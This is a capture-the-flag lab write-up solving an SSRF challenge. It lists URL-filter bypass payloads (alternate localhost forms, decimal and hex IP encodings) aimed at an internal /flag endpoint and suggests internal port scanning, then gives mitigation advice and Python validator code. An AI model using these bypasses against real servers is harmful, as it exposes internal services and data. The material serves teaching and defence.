
Labs / SSRF Validator

  • Challenge
  • Released 02 Oct 2025

🌐 Can you trick the server into revealing its own secrets?

A seemingly secure URL validation service stands between you and sensitive internal data! 🔒 The server thinks it's safe behind its firewall, but clever request manipulation might just convince it to fetch data from places it shouldn't. 🕵️ Master the art of server-side request forgery and turn the server against itself! 💥

Flags: 1
Points: 1

🌐 SSRF Validator - Complete Solution

Objective: Exploit the URL validation service to access internal endpoints and retrieve the flag from the server's internal API.

🔍 Step 1: Understanding the Application

The challenge presents a URL validation service that fetches and displays content from provided URLs. The service has basic protections against accessing localhost and internal IP ranges.

Initial Analysis:
• Service accepts URLs via POST to /validate
• Displays fetched content in response
• Has blacklist filters for localhost/127.0.0.1
• Blocks common internal IP ranges (192.168.x.x, 10.x.x.x)

🔍 Step 2: SSRF Bypass Techniques

Several methods can bypass the URL validation filters:

Method 1: Alternative Localhost Representations
http://0.0.0.0:8080/flag
http://0:8080/flag
http://[::]:8080/flag

Method 2: Decimal/Hex IP Encoding
http://2130706433:8080/flag (127.0.0.1 in decimal)
http://0x7f000001:8080/flag (127.0.0.1 in hex)

Method 3: URL Encoding
http://127.0.0.1:8080/flag with URL encoding
• Double encoding techniques

🔍 Step 3: Discovering Internal Services

The internal service runs on port 8080 and has a /flag endpoint that contains sensitive information:

Internal Service Discovery: Use SSRF to scan common internal ports (8080, 3000, 5000, 9000) and endpoints (/flag, /admin, /api, /internal) to locate the flag.

🔍 Step 4: Successful Exploitation

Submit the bypass payload to the validation service:

Exploitation Process:
1. Navigate to the URL validation form
2. Enter bypass payload: http://0.0.0.0:8080/flag
3. Submit the form via POST request
4. The server fetches content from internal endpoint
5. Flag is displayed in the response

🔍 Step 5: Alternative Methods

Multiple SSRF techniques work for this challenge:

Working Payloads:
http://0:8080/flag
http://2130706433:8080/flag
http://localhost:8080/flag (if filter bypass works)
http://127.1:8080/flag

📚 Learning Points
  • SSRF Fundamentals: Understanding server-side request forgery mechanics
  • Filter Bypass: Various techniques to circumvent URL validation
  • Internal Reconnaissance: Using SSRF for internal network discovery
  • Security Impact: How SSRF can expose internal services and data

Mitigation: Proper SSRF prevention includes whitelist-based URL validation, network segmentation, and avoiding user-controlled URLs in server requests.
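
The mitigation above, as an added Python example that is not the lab's own code: the validator canonicalizes the host before deciding, so the alternative localhost spellings listed in this write-up are rejected where a string blacklist lets them through. The function names, the stand-in blacklist and the `example.com` allowlist are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# URLs listed in this write-up (the IPv6 entry written with its port separator).
PAGE_PAYLOADS = [
    "http://0.0.0.0:8080/flag", "http://0:8080/flag", "http://[::]:8080/flag",
    "http://2130706433:8080/flag", "http://0x7f000001:8080/flag",
    "http://127.1:8080/flag", "http://localhost:8080/flag",
]
ALLOWED_HOSTS = frozenset({"example.com"})  # assumed allowlist

def naive_filter_allows(url):
    """Constructed stand-in for the lab's blacklist; the real filter is not shown."""
    host = urlsplit(url).hostname or ""
    return host not in ("localhost", "127.0.0.1") and \
        not host.startswith(("192.168.", "10."))

def canonical_ip(host):
    """Return the IP a host literal denotes, or None when it is a DNS name."""
    try:
        return ipaddress.ip_address(host)  # strict dotted quad or IPv6
    except ValueError:
        pass
    try:
        # The C library's inet_aton also parses decimal, hex and short forms
        # (2130706433, 0x7f000001, 127.1), as some HTTP clients do.
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None

def hardened_allows(url, allowed_hosts=ALLOWED_HOSTS):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = canonical_ip(parts.hostname)
    if ip is not None:
        # is_global is False for loopback, unspecified, private and link-local.
        return ip.is_global
    # DNS names must be on the allowlist; the fetcher should also refuse
    # redirects so an allowed host cannot bounce the request inward.
    return parts.hostname in allowed_hosts

def compare(payloads=PAGE_PAYLOADS):
    """Map each URL to (naive verdict, hardened verdict)."""
    return {u: (naive_filter_allows(u), hardened_allows(u)) for u in payloads}

if __name__ == "__main__":
    for url, (naive, hardened) in compare().items():
        print(f"{url:32} naive={naive!s:5} hardened={hardened}")
```

The check only decides whether a URL may be fetched; network segmentation, the other mitigation named above, still limits what the server can reach if a check is missed.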